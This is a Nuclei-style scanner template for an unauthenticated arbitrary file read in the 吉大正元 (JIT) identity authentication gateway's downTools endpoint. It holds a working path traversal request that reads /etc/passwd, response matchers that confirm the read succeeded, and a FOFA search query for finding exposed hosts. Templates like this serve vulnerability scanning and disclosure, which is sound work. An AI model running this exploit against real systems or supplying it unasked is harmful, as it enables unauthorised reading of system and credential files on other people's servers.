http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - 'root:'
            - /bin/bash
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /jit_pnx_portal/downTools?fileName=../../../../../../../../../etc/passwd HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
id: jidazhengyuan-downTools-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="/jit_pnx_portal/" || header="server: jit_pnxcore1 web service" || title="吉大正元身份认证网关"
        吉大正元身份认证网关 downTools 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 吉大正元身份认证网关 downTools 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247489115&idx=1&sn=03c4f2f4b394c69685af126536321a82&chksm=c267a368f5102a7e9d012f41a9becf65678219efcbc2ba9215f32aea3bc9ec091d5379a50275&token=824558965&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
        - 吉大正元身份认证网关
